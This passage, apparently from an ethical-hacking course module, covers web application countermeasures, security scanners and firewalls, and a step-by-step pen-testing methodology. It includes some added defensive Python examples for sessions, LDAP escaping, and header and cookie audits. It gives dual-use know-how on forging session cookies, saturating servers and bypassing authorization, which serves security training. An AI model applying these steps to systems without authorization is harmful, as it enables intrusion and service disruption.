- Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
- Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums
- Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated

How to Defend Against XSS Attacks

The following are the defensive techniques to prevent XSS attacks:

- Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification.
- Implement a stringent security policy. Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search in all the places where input from an HTTP request comes out as output through HTML.
- A variety of different HTML tags can be used to transmit malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If a vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks.
- Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users.
- The entire code of the website has to be reviewed if it is to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas to be checked are as follows: the headers, as well as
cookies, query strings, form fields, and hidden fields. During the validation process, there must be no attempt to recognize the active content, neither to remove it, filter it, nor sanitize it. There are many ways to encode around the known filters for active content. A "positive security policy" is highly recommended, which specifies what has to be allowed and what has to be removed. Negative or attack-signature-based policies are hard to maintain, as they are incomplete.
- Input fields should be limited to a maximum length, since most script attacks need several characters to get started.
How to Defend Against DoS Attacks

The following are the various measures that can be adopted to defend against DoS attacks:

- Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access.
- Secure the remote administration and connectivity testing.
- Prevent the use of unnecessary functions such as gets and strcpy, and prevent return addresses from being overwritten, etc.
- Prevent sensitive information from being overwritten.
- Perform thorough input validation.
- Data processed by the attacker should be stopped from being executed.
How to Defend Against Web Services Attacks

To defend against web services attacks, there should be a provision for multiple layers of protection that dynamically enforce legitimate application usage and block all known attack paths, with or without relying on signature databases. This combination has proven effective in blocking even unknown attacks. Standard HTTP authentication techniques such as digest authentication and SSL client-side certificates can be used for web services as well. Since most models incorporate business-to-business applications, it becomes easier to restrict access to only valid users.

- Configure firewalls/IDSs for web services anomaly and signature detection.
- Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
- Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
- Use document-centric authentication credentials that use SAML.
- Implement centralized in-line request and response schema validation.
- Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security.
- Block external references and use pre-fetched content when de-referencing URLs.
- Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
- Maintain and update a secure repository of XML schemas.
Web Application Countermeasures

The following are the various countermeasures that can be adopted for web applications.

Unvalidated Redirects and Forwards

- Avoid using redirects and forwards.
- If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.

Cross-Site Request Forgery

- Log off immediately after using a web application and clear the history.
- Do not allow your browser and websites to save login details.
- Check the HTTP Referer header, and when processing a POST, ignore URL parameters.

Broken Authentication and Session Management

- Use SSL for all authenticated parts of the application.
- Verify whether all the users' identities and credentials are stored in a hashed form.
- Never submit session data as part of a GET or POST.
Insecure Cryptographic Storage

- Do not create or use weak cryptographic algorithms.
- Generate encryption keys offline and store them securely.
- Ensure that encrypted data stored on disk is not easy to decrypt.
Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Insufficient Transport Layer Protection

- Non-SSL requests to web pages should be redirected to the SSL page.
- Set the 'secure' flag on all sensitive cookies.
- Configure the SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.

Directory Traversal

- Define access rights to the protected areas of the website.
- Apply checks/hot fixes that prevent the exploitation of vulnerabilities, such as Unicode handling, that affect directory traversal.
- Web servers should be updated with security patches in a timely manner.
Cookie/Session Poisoning

- Do not store plain text or weakly encrypted passwords in a cookie.
- Implement cookie timeouts.
- Cookie authentication credentials should be associated with an IP address.
- Make logout functions available.
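The session-related countermeasures above (a cookie that carries no credentials, the 'secure' flag, a timeout, binding the session to an IP address, an explicit logout, and the Referer check before a POST) come together in the small server-side session store below. It is an added example, not code from the module; the per-session CSRF token, the 15-minute lifetime and the site origin are this example's own assumptions.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie

# Added example, not code from the EC-Council module. It implements the session
# and cookie rules from the countermeasure lists: an unpredictable session
# identifier, no credentials in the cookie, the cookie marked Secure and
# HttpOnly, a server-side timeout, the session bound to the client IP address,
# an explicit logout, and a POST check that compares the Referer header with
# the site's origin. The CSRF token, lifetime and origin are assumptions.

SESSION_LIFETIME = 15 * 60            # seconds (assumed policy)
SITE_ORIGIN = "https://app.example"   # constructed origin for the demonstration


def _fingerprint(token: str) -> str:
    # Store only a hash of the token: a leaked session table then gives an
    # attacker nothing that can be replayed as a cookie.
    return hashlib.sha256(token.encode()).hexdigest()


class SessionStore:
    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._sessions = {}      # token fingerprint -> session record

    def create(self, user: str, client_ip: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[_fingerprint(token)] = {
            "user": user,
            "ip": client_ip,
            "expires": self._now() + SESSION_LIFETIME,
            "csrf": secrets.token_urlsafe(32),
        }
        return token

    def lookup(self, token: str, client_ip: str):
        """Return the record, or None if unknown, expired or from another IP."""
        key = _fingerprint(token)
        record = self._sessions.get(key)
        if record is None:
            return None
        if self._now() > record["expires"]:
            del self._sessions[key]   # timeout: discard rather than keep around
            return None
        if record["ip"] != client_ip:
            return None               # cookie presented from a different address
        return record

    def verify_post(self, token: str, client_ip: str,
                    form_csrf: str, referer: str) -> bool:
        """Checks to run before acting on a state-changing POST."""
        record = self.lookup(token, client_ip)
        if record is None:
            return False
        if not referer or not referer.startswith(SITE_ORIGIN + "/"):
            return False              # Referer must point back at this site
        # Constant-time comparison of the token carried in the form body; a
        # value arriving in the URL query string is never consulted here.
        return hmac.compare_digest(record["csrf"], form_csrf)

    def destroy(self, token: str) -> None:
        """Logout: invalidate the session on the server side."""
        self._sessions.pop(_fingerprint(token), None)


def session_cookie(token: str) -> str:
    """Render the Set-Cookie value with the protective attributes set."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = token
    morsel = cookie["SESSIONID"]
    morsel["secure"] = True        # only ever sent over HTTPS
    morsel["httponly"] = True      # not readable from page script
    morsel["path"] = "/"
    morsel["samesite"] = "Strict"  # not attached to cross-site requests
    return morsel.OutputString()


if __name__ == "__main__":
    store = SessionStore()
    tok = store.create("alice", "203.0.113.5")
    print(session_cookie(tok))
    print(store.lookup(tok, "203.0.113.5")["user"])
```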
Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Security Misconfiguration

- Configure all security mechanisms and turn off all unused services.
- Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords.
- Scan for the latest security vulnerabilities and apply the latest security patches.

LDAP Injection Attacks

- Perform type, pattern, and domain value validation on all input data.
- Make LDAP filters as specific as possible.
- Validate and restrict the amount of data returned to the user.
- Implement tight access control on the data in the LDAP directory.
- Perform dynamic testing and source code analysis.
File Injection Attack

- Strongly validate user input.
- Consider implementing a chroot jail.
- PHP: Disable allow_url_fopen and allow_url_include in php.ini.
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
- PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
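The LDAP injection countermeasures above (validate the input, keep the filter as specific as possible, and restrict the data returned) are shown here for a single-user lookup. This is an added example, not code from the module; the username pattern, the attribute names and the size limit are assumptions, and the escaping follows the RFC 4515 filter syntax.

```python
import re

# Added example, not code from the EC-Council module. It builds the LDAP search
# for a user-lookup feature the way the LDAP countermeasures describe: the
# user-supplied value is validated, escaped per RFC 4515, and placed into a
# filter that is as specific as possible, and the search asks only for the
# attributes and number of entries the page needs. The username pattern,
# attribute names and size limit are assumptions.

# Allow-list for usernames (assumed policy): lowercase letters, digits, . _ -
_USERNAME_RE = re.compile(r"[a-z0-9][a-z0-9._-]{0,31}")

# RFC 4515 escapes for the characters that carry meaning inside a filter value.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP filter assertion, so that
    metacharacters are matched literally instead of changing the filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_search(username: str) -> dict:
    """Return the parameters of a tightly scoped LDAP search for one user."""
    if not _USERNAME_RE.fullmatch(username):
        raise ValueError("username does not match the allowed pattern")
    return {
        # Specific filter: one object class, one attribute, exact match.
        "filter": "(&(objectClass=inetOrgPerson)(uid=%s))"
                  % escape_filter_value(username),
        # Ask only for what the page displays.
        "attributes": ["cn", "mail"],
        # Never return more than one entry for a single-user lookup.
        "size_limit": 1,
    }


if __name__ == "__main__":
    print(build_user_search("jdoe"))
    print(escape_filter_value("*)(uid=*"))
```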
How to Defend Against Web Application Attacks

[Figure: slide diagram with the labels Operating System, LDAP Server, Custom Error Page, and "Make LDAP filter as specific as possible"]

To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up to date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameter queries to retrieve data, disable verbose error messages (which can give the attacker useful information), and use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using a non-privileged account and grant least privileges to the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
FIGURE 13.61: How to Defend Against Web Application Attacks (diagram of attacker, login form, web application, operating system, LDAP server and custom error page, annotated with the defences: perform input validation; configure the firewall to deny external ICMP traffic; shut down unnecessary services and ports; use a WAF firewall/IDS and filter packets; keep patches current; connect to the database using a non-privileged account; use stored procedures and parameter queries; grant least privileges to the database, tables, and columns; analyze the source code for SQL injection; minimize use of third-party apps; sanitize and filter user input; disable commands like xp_cmdshell; perform dynamic testing and source code analysis; make LDAP filters as specific as possible; disable verbose error messages and use custom error pages)
Module Flow

Now we will discuss web application security tools. Web application security tools help you to detect the possible vulnerabilities in web applications automatically. Prior to this, we discussed web application countermeasures that prevent attackers from exploiting web applications. In addition to countermeasures, you can also employ security tools to protect your web applications from being hacked. Tools, in addition to the countermeasures, offer more protection.
This section is dedicated to the security tools that protect web applications against various attacks.
Web Application Security Tool: Acunetix Web Vulnerability Scanner

Source: http://www.acunetix.com

Acunetix Web Vulnerability Scanner automatically checks your web applications for SQL injection, XSS, and other web vulnerabilities. It includes advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer. It port scans a web server and runs security checks against network services. It also tests web forms and password-protected areas. The automatic client script analyzer allows for security testing of Ajax and Web 2.0 applications.
FIGURE 13.62: Acunetix Web Vulnerability Scanner Tool Screenshot
Web Application Security Tool: Watcher Web Security Tool

Source: http://www.casaba.com

Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it is safe for production use. It detects web-application security issues and operational configuration issues.
FIGURE 13.63: Watcher Web Security Tool Screenshot
Web Application Security Scanner: Netsparker

Source: http://www.mavitunasecurity.com

Netsparker performs automated, comprehensive web application scanning for vulnerabilities such as SQL injection, cross-site scripting, remote code injection, etc. It delivers detection, confirmation, and exploitation of vulnerabilities in a single integrated environment. Netsparker can find and report security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. It allows you to resolve security problems before they are actually misused and compromised by unknown attackers.
FIGURE 13.64: Netsparker Tool Screenshot
Web Application Security Tool: N-Stalker Web Application Security Scanner

Source: http://nstalker.com

N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be explored by external agents. It contains all web security assessment checks such as code injection, cross-site scripting, parameter tampering, web server vulnerabilities, etc.
FIGURE 13.65: N-Stalker Web Application Security Scanner Tool Screenshot
Web Application Security Tool: VampireScan

Source: http://www.vampiretech.com

VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal. It can protect your website from hackers. This tool can scan and protect your infrastructure and web applications from cyber-threats and can also give you direct, actionable insight on high, medium, and low risk vulnerabilities.
FIGURE 13.66: N-Stalker Web Application Security Scanner Tool Screenshot
Web Application Security Tools

Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:

- Sandcat Mini available at http://www.syhunt.com
- OWASP ZAP available at http://www.owasp.org
- skipfish available at http://code.google.com
- SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
- SPIKE Proxy available at http://www.immunitysec.com
- Websecurify available at http://www.websecurify.com
- Netbrute available at http://www.rawlogic.com
- X5s available at http://www.casaba.com
- WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com
- Ratproxy available at http://code.google.com
Web Application Security Tools (Cont'd)

In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:

- Wapiti available at http://wapiti.sourceforge.net
- WebWatchBot available at http://www.exclamationsoft.com
- KeepNI available at http://www.keepni.com
- Grabber available at http://rgaucher.info
- XSSS available at http://www.sven.de
- Syhunt Hybrid available at http://www.syhunt.com
- Exploit-Me available at http://labs.securitycompass.com
- WSDigger available at http://www.mcafee.com
- Arachni available at http://arachni-scanner.com
- Vega available at http://www.subgraph.com
Web Application Firewall: dotDefender

Source: http://www.applicure.com

dotDefender is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior and detects and blocks SQL injection attacks.
FIGURE 13.67: dotDefender
Web Application Firewall: ServerDefender VP

Source: http://www.port80software.com

The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.
FIGURE 13.68: ServerDefender VP
Web Application Firewalls

Web application firewalls secure websites, web applications, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Commonly used web application firewalls are listed as follows:

- Radware's AppWall available at http://www.radware.com
- ThreatSentry available at http://www.privacyware.com
- QualysGuard WAF available at http://www.qualys.com
- ThreatRadar available at http://www.imperva.com
- ModSecurity available at http://www.modsecurity.org
- Barracuda Web Application Firewall available at https://www.barracudanetworks.com
- Stingray Application Firewall available at http://www.riverbed.com
- IBM Security AppScan available at http://www-01.ibm.com
- Trustwave WebDefend available at https://www.trustwave.com
- Cyberoam's Web Application Firewall available at http://www.cyberoam.com
Module Flow

As mentioned previously, web applications are more vulnerable to attacks. Attackers use web applications as the sources for spreading attacks by turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.
Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Web Application Pen Testing

Web application pen testing is done to detect various security vulnerabilities and associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities. Web application pen testing helps in:

- Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses.
- Verification of Vulnerabilities: Exploit the vulnerability in order to test and fix the issue.
- Remediation of Vulnerabilities: Retest the solution against the vulnerability to ensure that it is completely secure.
Web Application Pen Testing (Cont'd)

[Slide: test flow: Information Gathering, Configuration Management Testing, Authentication Testing, Session Management Testing, Authorization Testing, Business Logic Testing, Data Validation Testing, Denial-of-Service Testing, Web Services Testing, AJAX Testing]

The general steps that you need to follow to conduct a web application penetration test are listed as follows. In a later section, each step is explained in detail.

Step 1: Defining objective
You should define the aim of the penetration test before conducting it. This helps you move in the right direction towards the aim of the penetration test.

Step 2: Information gathering
You should gather as much information as possible about your target system or network.

Step 3: Configuration management testing
Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you protect against known vulnerabilities by installing the latest updates.

Step 4: Authentication testing
Test the authentication session to understand the authentication mechanism and to determine the possible exploits in it.

Step 5: Session management testing
Perform session management testing to check your web application against the various attacks that are based on the session ID, such as session hijacking, session fixation, etc.

Step 6: Denial-of-service testing
Send a vast number of requests to the web application until the server gets saturated. Analyze the behavior of the application when the server is saturated. In this way you can test your web application against denial-of-service attacks.

Step 7: Data validation testing
Failing to adopt a proper data validation method is the common security weakness observed in most web applications. This may further lead to major vulnerabilities in web applications. Hence, before a hacker finds those vulnerabilities and exploits your application, perform data validation testing and protect your web application.

Step 8: Business logic testing
Web application security flaws may be present even in business logic. Hence, you should test the business logic for flaws. Exploiting the business logic, attackers may do something that is not allowed by the business, and it may sometimes lead to great financial loss. Testing business logic for security flaws requires unconventional thinking.

Step 9: Authorization testing
Analyze how a web application is authorizing the user and then try to find and exploit the vulnerabilities present in the authorization mechanism.

Step 10: Web services testing
Web services use the HTTP protocol in conjunction with XML, WSDL, SOAP, and UDDI technologies. Therefore, web services have XML/parser-related vulnerabilities in addition to SQL injection, information disclosure, etc. You should conduct web services testing to determine the vulnerabilities of web-based services.

Step 11: AJAX testing
Though more responsive web applications are developed using AJAX, an AJAX application is likely to be as vulnerable as a traditional web application. Testing for AJAX is challenging because web application developers are given full freedom to design the way of communication between client and server.

Step 12: Document all the findings
Once you conduct all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the document, explain the current security posture to the concerned parties, and suggest how they can enhance their security.
Information Gathering

Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:

Step 1: Analyze the robots.txt file
robots.txt is a file that instructs web robots about the website, such as the directories that are allowed and disallowed to the user. Hence, analyze robots.txt and determine the allowed and disallowed directories of a web application. You can retrieve and analyze the robots.txt file using tools such as GNU Wget.

Step 2: Perform search engine reconnaissance
Use the advanced "site:" search operator and then click "Cached" to perform search engine reconnaissance. It gives you information such as issues of web application structure and the error pages produced.

Step 3: Identify application entry points
Identify application entry points using tools such as Webscarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox). Cookie information, 300 HTTP and 400 status codes, and 500 internal server errors may give clues about entry points of the target web application.

Step 4: Identify the web applications
To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as Nmap (port scanner) and Nessus. Check for web applications, old versions of files, or artifacts. Sometimes old versions of files may give useful information that attackers can use to launch attacks on the web application.

Step 5: Analyze the output from HEAD and OPTIONS HTTP requests
Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (Googling). This may reveal information such as the web server software version, scripting environment, and OS in use.
Information Gathering (Cont'd)

Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/other) in order to collect confidential information from the server. This may reveal information such as software versions, details of databases, bugs, and technological components.

Step 7: Test for recognized file types/extensions/directories
Test for recognized file types/extensions/directories by requesting common file extensions such as .asp, .htm, .php, .exe, and observe the response. This may give you an idea about the web application environment.

Step 8: Examine source of available pages
Examine the source code from the accessible pages of the application front-end. This provides clues about the underlying application environment.

Step 9: TCP/ICMP and service fingerprinting
Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about web application services and associated ports.
Configuration Management Testing

Once you gather information about the web application environment, test the configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.

Step 1: Perform SSL/TLS testing
SSL/TLS testing allows you to identify the ports associated with SSL/TLS-wrapped services. You can do this with the help of tools such as Nmap and Nessus. This helps disclose confidential information.

Step 2: Perform infrastructure configuration management testing
Perform network scanning and analyze web server banners to analyze the source code of the application.

Step 3: Perform application configuration management testing
Test the application configuration management using CGI scanners and by reviewing the contents of the web server, application server, comments, configuration, and logs. This gives you information about the source code, log files, and default error codes.

Step 4: Test for file extensions handling
Use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection to test for file extensions handling. This may reveal confidential information about access credentials.

Step 5: Verify the presence of old, backup, and unreferenced files
Review source code and enumerate application pages and functionality to verify old, backup, and unreferenced files. These may reveal the installation paths and passwords for applications and databases.

Step 6: Test for infrastructure and application admin interfaces
Perform directory and file enumeration, review server and application documentation, etc. to test for infrastructure and application admin interfaces. Admin interfaces can be used to gain access to the admin functionality.

Step 7: Test for HTTP methods and XST
Review the OPTIONS HTTP method using Netcat or Telnet to test for HTTP methods and XST. This may reveal credentials of legitimate users.
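The robots.txt analysis (Information Gathering, Step 1), the HEAD/OPTIONS output analysis (Step 5) and the HTTP methods/XST check (Configuration Management, Step 7) all come down to parsing what the server returns. The following is an added example, not EC-Council's code, that runs these checks offline on constructed sample input; the header names treated as banners and the set of methods flagged for review are my assumptions.

```python
"""Added example (not EC-Council's code): offline analysis of the artefacts the
information-gathering and configuration-management steps collect, namely a
robots.txt file, the headers of a HEAD response, and the Allow header of an
OPTIONS response. All inputs below are constructed samples."""
from typing import Dict, List, Tuple

# Constructed sample robots.txt, as retrieved with a tool such as GNU Wget.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Sitemap: https://example.invalid/sitemap.xml
"""

# Constructed sample response headers (status line omitted) from HEAD and OPTIONS.
SAMPLE_HEAD_HEADERS = """Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Type: text/html
"""

SAMPLE_OPTIONS_HEADERS = """Allow: GET, HEAD, POST, OPTIONS, TRACE, PUT
Server: Apache/2.2.15 (CentOS)
"""

# Headers that typically disclose server software, scripting environment, or OS (assumed list).
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
# Methods whose presence in Allow warrants follow-up; TRACE is what XST relies on (assumed list).
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}


def parse_robots(text: str) -> Dict[str, List[str]]:
    """Return the Allow and Disallow paths listed in a robots.txt body."""
    result: Dict[str, List[str]] = {"allow": [], "disallow": []}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key in result and value:
            result[key].append(value)
    return result


def parse_headers(raw: str) -> Dict[str, str]:
    """Parse 'Name: value' lines into a dict keyed by lower-cased header name."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def banner_disclosures(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (header, value) pairs that reveal software versions."""
    return [(h, headers[h]) for h in BANNER_HEADERS if h in headers]


def risky_methods(headers: Dict[str, str]) -> List[str]:
    """Return enabled HTTP methods from the Allow header that need review."""
    allow = headers.get("allow", "")
    enabled = {m.strip().upper() for m in allow.split(",") if m.strip()}
    return sorted(enabled & RISKY_METHODS)


def assess(robots_txt: str, head_raw: str, options_raw: str) -> Dict[str, object]:
    """Combine the three checks into one findings dict for the report."""
    return {
        "disallowed_dirs": parse_robots(robots_txt)["disallow"],
        "banners": banner_disclosures(parse_headers(head_raw)),
        "risky_methods": risky_methods(parse_headers(options_raw)),
    }


if __name__ == "__main__":
    findings = assess(SAMPLE_ROBOTS, SAMPLE_HEAD_HEADERS, SAMPLE_OPTIONS_HEADERS)
    for key, value in findings.items():
        print(f"{key}: {value}")
```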
Authentication Testing

You need to perform the following steps to carry out authentication testing:

Step 1: Test for vulnerable "remember password" and password reset
Test for vulnerable "remember password" and password reset by attempting to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page; through this, password authentication weaknesses can be uncovered.

Step 2: Test for logout and browser cache management
Check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.

Step 3: Test for CAPTCHA
Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you determine authentication vulnerabilities.

Step 4: Test for multiple-factor authentication
Check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.

Step 5: Test for race conditions
Attempt to force a race condition and make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review to check if there is a chance for race conditions.
Session Management Testing

After testing the configuration management, test how the application manages the session. The following are the steps to conduct session management pen testing:

Step 1: Test for session management schema
Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack. This allows you to test your application against cookie tampering, which results in hijacking the sessions of legitimate users.

Step 2: Test for cookie attributes
Test for cookie attributes using intercepting proxies such as Webscarab, Burp Proxy, OWASP ZAP, or traffic-intercepting browser plugins such as TamperIE (for IE) and Tamper Data (for Firefox). If you are able to retrieve cookie information, then you can use this information to hijack a valid session.

Step 3: Test for session fixation
To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the Webscarab tool. This helps you determine whether your application is vulnerable to session hijacking.

Step 4: Test for exposed session variables
Confidential information in the session token leads to a replay session attack. Therefore, test for exposed session variables by inspecting encryption and reuse of the session token, proxies and caching, GET and POST, and transport vulnerabilities.

Step 5: Test for CSRF (Cross Site Request Forgery)
Examine the URLs in the restricted area to test for CSRF. A CSRF attack compromises end-user data and operation or the entire web application.
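Steps 1 and 2 above, analyzing the cookie generation algorithm from collected samples and checking cookie attributes, can be partly automated once the intercepting proxy has recorded the Set-Cookie headers. The following is an added example, not from the original module, that audits constructed Set-Cookie headers and two constructed token sample sets; the required attribute list and the thresholds used to call a token set "weak" are my assumptions.

```python
"""Added example (not EC-Council's code): offline checks for the session
management steps, namely auditing Set-Cookie attributes and looking for weak
session identifier generation in a collected sample of tokens. All cookies and
tokens below are constructed samples, not captured from any real application."""
import math
from collections import Counter
from typing import Dict, List

# Constructed sample Set-Cookie headers as an intercepting proxy would record them.
SAMPLE_SET_COOKIES = [
    "JSESSIONID=A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6; Path=/; Secure; HttpOnly; SameSite=Lax",
    "sessid=1001; Path=/",
    "track=abc123; Path=/; Secure",
]

# Constructed sequential tokens, the kind a weak generator (counter or timestamp) emits.
WEAK_TOKEN_SAMPLES = ["1001", "1002", "1003", "1004", "1005"]
# Constructed tokens of the kind a CSPRNG-backed generator emits (32 hex chars, 128 bits).
STRONG_TOKEN_SAMPLES = [
    "3f9a7c2e81d04b6fa5e1c9d2b7a3f0e4",
    "b72e0d1c4f9a83e6d5c1a0b9e8f7d6c3",
    "0c4e9a1d7b3f2e8c6a5d4b9f1e0c7a2b",
    "e81d3c5b9a0f4e2d7c6b1a8f3e9d0c5a",
]

# Attributes a session cookie should carry (assumed policy for this example).
REQUIRED_ATTRS = ("secure", "httponly", "samesite")


def audit_set_cookie(header: str) -> Dict[str, object]:
    """Return the cookie name and the attributes from REQUIRED_ATTRS it lacks."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    present = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = [a for a in REQUIRED_ATTRS if a not in present]
    return {"name": name, "missing": missing}


def shannon_entropy_bits(token: str) -> float:
    """Per-character Shannon entropy of a single token, in bits."""
    counts = Counter(token)
    total = len(token)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def looks_sequential(samples: List[str]) -> bool:
    """True when every sample is decimal and consecutive samples differ by a constant."""
    try:
        values = [int(s, 10) for s in samples]
    except ValueError:
        return False
    if len(values) < 3:
        return False
    diffs = {b - a for a, b in zip(values, values[1:])}
    return len(diffs) == 1


def assess_tokens(samples: List[str]) -> Dict[str, object]:
    """Flag a token sample set that is short, sequential, or low-entropy (assumed thresholds)."""
    min_len = min(len(s) for s in samples)
    avg_entropy = sum(shannon_entropy_bits(s) for s in samples) / len(samples)
    sequential = looks_sequential(samples)
    weak = sequential or min_len < 16 or avg_entropy < 3.0
    return {
        "min_length": min_len,
        "sequential": sequential,
        "avg_entropy_bits": round(avg_entropy, 2),
        "weak": weak,
    }


if __name__ == "__main__":
    for header in SAMPLE_SET_COOKIES:
        print(audit_set_cookie(header))
    print("weak samples:", assess_tokens(WEAK_TOKEN_SAMPLES))
    print("strong samples:", assess_tokens(STRONG_TOKEN_SAMPLES))
```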
Authorization Testing

Follow the steps here to test the web application against authorization vulnerabilities:

Step 1: Test for path traversal
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.

Step 2: Test for bypassing authorization schema
Test for bypassing the authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role. If the attacker succeeds in bypassing the authorization schema, he or she can gain illegal access to reserved functions/resources.

Step 3: Test for privilege escalation
Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.
Data Validation Testing

Web applications must employ proper data validation methods. Otherwise, there may be a chance for the attacker to break into the communication between the client and the server, and inject malicious data. Hence, data validation pen testing must be conducted to ensure that the current data validation methods or techniques employed by the web application offer appropriate security. Follow the steps here to perform data validation testing:

Step 1: Test for reflected cross-site scripting
